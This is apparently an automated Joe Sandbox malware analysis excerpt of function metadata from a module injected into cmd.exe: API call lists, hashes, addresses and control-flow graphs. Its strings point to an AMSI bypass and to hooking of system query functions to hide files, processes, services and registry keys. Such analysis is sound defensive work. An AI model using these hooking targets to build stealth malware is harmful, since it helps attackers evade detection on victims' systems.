                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction ID: 0fd0f5001b19b18dfbaafd6f630e943746e03fc45313e0a380a3b490d0de784a
                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction Fuzzy Hash: E4D06735A19616F5EE0CAB35E8543F82263BF64F81FD40439C73B052A0EE3C895D8B50

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                          • API String ID: 1735320900-4225371247
                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction ID: 8608ff7e3106e504176d4ce4d08d2332e48d05dd4e4b8f5001fabdccf8e53eb4
                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction Fuzzy Hash: 14518D75A18A5BF5EA00DB74E8516F827A2BF417E8FC40532E63B12171EE78825ECB41

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32 ref: 000001F1197D3A35
                          • PathFindFileNameW.SHLWAPI ref: 000001F1197D3A44
                            • Part of subcall function 000001F1197D3F88: StrCmpNIW.SHLWAPI(?,?,?,000001F1197D272F), ref: 000001F1197D3FA0
                            • Part of subcall function 000001F1197D3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3EDB
                            • Part of subcall function 000001F1197D3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3F0E
                            • Part of subcall function 000001F1197D3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3F2E
                            • Part of subcall function 000001F1197D3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3F47
                            • Part of subcall function 000001F1197D3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3F68
                          • CreateThread.KERNELBASE ref: 000001F1197D3A8B
                            • Part of subcall function 000001F1197D1E74: GetCurrentThread.KERNEL32 ref: 000001F1197D1E7F
                            • Part of subcall function 000001F1197D1E74: CreateThread.KERNELBASE ref: 000001F1197D2043
                            • Part of subcall function 000001F1197D1E74: TlsAlloc.KERNEL32 ref: 000001F1197D2049
                            • Part of subcall function 000001F1197D1E74: TlsAlloc.KERNEL32 ref: 000001F1197D2055
                            • Part of subcall function 000001F1197D1E74: TlsAlloc.KERNEL32 ref: 000001F1197D2061
                            • Part of subcall function 000001F1197D1E74: TlsAlloc.KERNEL32 ref: 000001F1197D206D
                            • Part of subcall function 000001F1197D1E74: TlsAlloc.KERNEL32 ref: 000001F1197D2079
                            • Part of subcall function 000001F1197D1E74: TlsAlloc.KERNEL32 ref: 000001F1197D2085
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                          • String ID:
                          • API String ID: 2779030803-0
                          • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                          • Instruction ID: bcfa1e699537b31cf7380b092e16c2800d7b324eeb8ef57ecad7f77effc4225b
                          • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                          • Instruction Fuzzy Hash: 26110532718603E2FB649731A94A3FD22D2AF947C9FD04139E637921D1EE7AC44C8E51

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: FileHandleType
                          • String ID:
                          • API String ID: 3000768030-0
                          • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                          • Instruction ID: e8814af4bbb443cc36d56d7f977ad69e113dd95853ee7cc615e3f062641d6d05
                          • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                          • Instruction Fuzzy Hash: D4315032618B4AE1EF648B3995803B96662F345BE4FA50359DBBB4B3F0CB35D4A1D340

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: FileHandleType
                          • String ID:
                          • API String ID: 3000768030-0
                          • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                          • Instruction ID: 847fdeab688967f44fa040a3fe45b9419560f71aca3dd7caa583aa153a52593a
                          • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                          • Instruction Fuzzy Hash: A2319332628B46E1DB608B3495802BD2692FB45BF0FA50319DBBB177F0CB35D465C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                          • Instruction ID: b78735698d040ed6ab0dfe9d9e0d2e350d3222b04f0098484a61ed04758fa10d
                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                          • Instruction Fuzzy Hash: F591C272B05552D7EB648F39D400BBD7392FB54BE8F949134DF6A07798EA38D8168B00

                          Control-flow Graph

                          APIs
                            • Part of subcall function 000001F1197D1724: GetProcessHeap.KERNEL32 ref: 000001F1197D172F
                            • Part of subcall function 000001F1197D1724: HeapAlloc.KERNEL32 ref: 000001F1197D173E
                            • Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D17AE
                            • Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D17DB
                            • Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D17F5
                            • Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D1815
                            • Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D1830
                            • Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D1850
                            • Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D186B
                            • Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D188B
                            • Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D18A6
                            • Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D18C6
                          • SleepEx.KERNELBASE ref: 000001F1197D1BDF
                            • Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D18E1
                            • Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D1901
                            • Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D191C
                            • Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D193C
                            • Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D1957
                            • Part of subcall function 000001F1197D1724: RegOpenKeyExW.ADVAPI32 ref: 000001F1197D1977
                            • Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D1992
                            • Part of subcall function 000001F1197D1724: RegCloseKey.ADVAPI32 ref: 000001F1197D199C
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: CloseOpen$Heap$AllocProcessSleep
                          • String ID:
                          • API String ID: 948135145-0
                          • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                          • Instruction ID: 8c5ded9d7a8153fe8965c62a8c2f6ed1289f378f544b193f4f20cad4b6c6f417
                          • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                          • Instruction Fuzzy Hash: 7031CB76308642E1EA589B36F6913FD23E6BF44BD0F845431DF2F87696EF14C8588A14

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 454 1f119d52ff0-1f119d53069 456 1f119d53384-1f119d533a7 454->456 457 1f119d5306f-1f119d53075 454->457 457->456 458 1f119d5307b-1f119d5307e 457->458 458->456 459 1f119d53084-1f119d53087 458->459 459->456 460 1f119d5308d-1f119d5309d GetModuleHandleA 459->460 461 1f119d530b1 460->461 462 1f119d5309f-1f119d530af GetProcAddress 460->462 463 1f119d530b4-1f119d530d2 461->463 462->463 463->456 465 1f119d530d8-1f119d530f7 StrCmpNIW 463->465 465->456 466 1f119d530fd-1f119d53101 465->466 466->456 467 1f119d53107-1f119d53111 466->467 467->456 468 1f119d53117-1f119d5311e 467->468 468->456 469 1f119d53124-1f119d53137 468->469 470 1f119d53147 469->470 471 1f119d53139-1f119d53145 469->471 472 1f119d5314a-1f119d5314e 470->472 471->472 473 1f119d5315e 472->473 474 1f119d53150-1f119d5315c 472->474 475 1f119d53161-1f119d5316b 473->475 474->475 476 1f119d53251-1f119d53255 475->476 477 1f119d53171-1f119d53174 475->477 480 1f119d53376-1f119d5337e 476->480 481 1f119d5325b-1f119d5325e 476->481 478 1f119d53186-1f119d53190 477->478 479 1f119d53176-1f119d53183 call 1f119d51a30 477->479 485 1f119d53192-1f119d5319f 478->485 486 1f119d531c4-1f119d531ce 478->486 479->478 480->456 480->469 482 1f119d53260-1f119d5326c call 1f119d51a30 481->482 483 1f119d5326f-1f119d53279 481->483 482->483 488 1f119d532a9-1f119d532ac 483->488 489 1f119d5327b-1f119d53288 483->489 485->486 491 1f119d531a1-1f119d531ae 485->491 492 1f119d531fe-1f119d53201 486->492 493 1f119d531d0-1f119d531dd 486->493 498 1f119d532ae-1f119d532b7 call 1f119d51cc4 488->498 499 1f119d532b9-1f119d532c6 lstrlenW 488->499 489->488 497 1f119d5328a-1f119d53297 489->497 500 1f119d531b1-1f119d531b7 491->500 495 1f119d53203-1f119d5320d call 1f119d51cc4 492->495 496 1f119d5320f-1f119d5321c lstrlenW 492->496 493->492 501 1f119d531df-1f119d531ec 493->501 495->496 508 1f119d53247-1f119d5324c 495->508 505 1f119d5321e-1f119d5322d call 1f119d51cfc 496->505 506 1f119d5322f-1f119d53241 call 1f119d53f88 496->506 504 1f119d5329a-1f119d532a0 497->504 498->499 516 1f119d532ee-1f119d532f9 498->516 510 1f119d532c8-1f119d532d7 call 1f119d51cfc 499->510 511 1f119d532d9-1f119d532e3 call 1f119d53f88 499->511 500->508 509 1f119d531bd-1f119d531c2 500->509 502 1f119d531ef-1f119d531f5 501->502 502->508 512 1f119d531f7-1f119d531fc 502->512 515 1f119d532a2-1f119d532a7 504->515 504->516 505->506 505->508 506->508 520 1f119d532e6-1f119d532e8 506->520 508->520 509->486 509->500 510->511 510->516 511->520 512->492 512->502 515->488 515->504 523 1f119d53370-1f119d53374 516->523 524 1f119d532fb-1f119d532ff 516->524 520->480 520->516 523->480 528 1f119d53307-1f119d53321 call 1f119d63a40 524->528 529 1f119d53301-1f119d53305 524->529 530 1f119d53324-1f119d53327 528->530 529->528 529->530 533 1f119d5334a-1f119d5334d 530->533 534 1f119d53329-1f119d53347 call 1f119d63a40 530->534 533->523 536 1f119d5334f-1f119d5336d call 1f119d63a40 533->536 534->533 536->523
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                          • API String ID: 2119608203-3850299575
                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction ID: 0ef0d7b3f5b37917baa858f0e013441e652206fd7ff9a4d5d4805b32e0a31a80
                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction Fuzzy Hash: D1B14A32218A9AE2FF658F7595407F9E3B6F744B84F845026EF2A93794DE35C990C340

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 368 1f1197d2ff0-1f1197d3069 370 1f1197d306f-1f1197d3075 368->370 371 1f1197d3384-1f1197d33a7 368->371 370->371 372 1f1197d307b-1f1197d307e 370->372 372->371 373 1f1197d3084-1f1197d3087 372->373 373->371 374 1f1197d308d-1f1197d309d GetModuleHandleA 373->374 375 1f1197d309f-1f1197d30af GetProcAddress 374->375 376 1f1197d30b1 374->376 377 1f1197d30b4-1f1197d30d2 375->377 376->377 377->371 379 1f1197d30d8-1f1197d30f7 StrCmpNIW 377->379 379->371 380 1f1197d30fd-1f1197d3101 379->380 380->371 381 1f1197d3107-1f1197d3111 380->381 381->371 382 1f1197d3117-1f1197d311e 381->382 382->371 383 1f1197d3124-1f1197d3137 382->383 384 1f1197d3139-1f1197d3145 383->384 385 1f1197d3147 383->385 386 1f1197d314a-1f1197d314e 384->386 385->386 387 1f1197d315e 386->387 388 1f1197d3150-1f1197d315c 386->388 389 1f1197d3161-1f1197d316b 387->389 388->389 390 1f1197d3251-1f1197d3255 389->390 391 1f1197d3171-1f1197d3174 389->391 392 1f1197d325b-1f1197d325e 390->392 393 1f1197d3376-1f1197d337e 390->393 394 1f1197d3186-1f1197d3190 391->394 395 1f1197d3176-1f1197d3183 call 1f1197d1a30 391->395 396 1f1197d3260-1f1197d326c call 1f1197d1a30 392->396 397 1f1197d326f-1f1197d3279 392->397 393->371 393->383 399 1f1197d3192-1f1197d319f 394->399 400 1f1197d31c4-1f1197d31ce 394->400 395->394 396->397 404 1f1197d32a9-1f1197d32ac 397->404 405 1f1197d327b-1f1197d3288 397->405 399->400 407 1f1197d31a1-1f1197d31ae 399->407 401 1f1197d31fe-1f1197d3201 400->401 402 1f1197d31d0-1f1197d31dd 400->402 410 1f1197d320f-1f1197d321c lstrlenW 401->410 411 1f1197d3203-1f1197d320d call 1f1197d1cc4 401->411 402->401 408 1f1197d31df-1f1197d31ec 402->408 413 1f1197d32ae-1f1197d32b7 call 1f1197d1cc4 404->413 414 1f1197d32b9-1f1197d32c6 lstrlenW 404->414 405->404 412 1f1197d328a-1f1197d3297 405->412 415 1f1197d31b1-1f1197d31b7 407->415 420 1f1197d31ef-1f1197d31f5 408->420 423 1f1197d321e-1f1197d322d call 1f1197d1cfc 410->423 424 1f1197d322f-1f1197d3241 call 1f1197d3f88 410->424 411->410 417 1f1197d3247-1f1197d324c 411->417 422 1f1197d329a-1f1197d32a0 412->422 413->414 431 1f1197d32ee-1f1197d32f9 413->431 418 1f1197d32d9-1f1197d32e3 call 1f1197d3f88 414->418 419 1f1197d32c8-1f1197d32d7 call 1f1197d1cfc 414->419 416 1f1197d31bd-1f1197d31c2 415->416 415->417 416->400 416->415 426 1f1197d32e6-1f1197d32e8 417->426 418->426 419->418 419->431 420->417 429 1f1197d31f7-1f1197d31fc 420->429 422->431 432 1f1197d32a2-1f1197d32a7 422->432 423->417 423->424 424->417 424->426 426->393 426->431 429->401 429->420 439 1f1197d3370-1f1197d3374 431->439 440 1f1197d32fb-1f1197d32ff 431->440 432->404 432->422 439->393 442 1f1197d3307-1f1197d3321 call 1f1197e3a40 440->442 443 1f1197d3301-1f1197d3305 440->443 444 1f1197d3324-1f1197d3327 442->444 443->442 443->444 447 1f1197d334a-1f1197d334d 444->447 448 1f1197d3329-1f1197d3347 call 1f1197e3a40 444->448 447->439 450 1f1197d334f-1f1197d336d call 1f1197e3a40 447->450 448->447 450->439
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                          • API String ID: 2119608203-3850299575
                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction ID: 232c2e04594ff828c422d42458b0fb98eacaa6f29662638dca0c9d352219da26
                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction Fuzzy Hash: 82B15A72218A92E2EB588F3595407FDA3E6FF45BC8F845026EF2A53794DA35C948CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                          • Instruction ID: b91a0d682df5856898b1328428cf39bee276f93f4a5f8c588e5987275ae4eebb
                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                          • Instruction Fuzzy Hash: 04311872209B85D6EB608F60E8403EE6376F788748F84402ADB5E47B98DF78C688C710
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                          • Instruction ID: eccad80ba7346fefe32b38bcdc6f8dcd2785a4049c55153aec196941a979fa7b
                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                          • Instruction Fuzzy Hash: 52312D72209B95D6EB608F60E8403ED73A5FB84788F84402ADB5E47B94EF78C648CB10
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                          • Instruction ID: 34cf1c4fed8f77815ee018c9dfd184534307199c2e6aef4f9bbbdcee935c563c
                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                          • Instruction Fuzzy Hash: 23415C36618B85D6EB60CB34E8403EE73A5F789754F900225EBAE47B98DF38C555CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                          • Instruction ID: 616f3185b3cec4ce2ff8ef98dcda79f2db60c3b03cb88971ff00e924c6603e8e
                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                          • Instruction Fuzzy Hash: C4412E37618B81D6DB608B35E8403EE73A5FB88798F940125EBAE46B94DF38C5598B00
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID:
                          • API String ID: 1164774033-0
                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction ID: 6f19a5f829edcf7152993ceb78de2d7fdc558bc481f3dcc8011a5eaec3fca814
                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction Fuzzy Hash: 89A1D63270868AE9FF20DB7594403FE6BB2A745794F944135DBAA2B699CA78C443C710
                          APIs
                          Memory Dump Source
